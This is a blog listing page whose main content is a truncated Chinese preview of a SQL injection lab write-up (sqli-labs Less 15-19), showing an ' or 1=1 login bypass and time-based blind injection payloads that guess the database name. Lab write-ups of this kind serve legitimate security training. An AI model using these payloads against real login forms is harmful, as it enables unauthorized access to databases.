- 博客(2)
- 收藏
- 关注
RSS订阅原创 sqli靶场Less15-19
Less-15: 尝试输入万能语句'or 1=1,尝试后发现为单引号闭合,登录成功 查看源码,报错信息被注释,可以使用时间型或布尔型进行尝试 猜数据库,缩小范围,猜出库名为security uname=1 passwd=1' or If(ascii(substr(database(),1,1))=115,1,sleep(5))-- # uname=1 passwd=1' or If(ascii(substr(database(),2,1))=101,1,sleep(5))-- #...
2022-04-17 18:08:57
2347
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人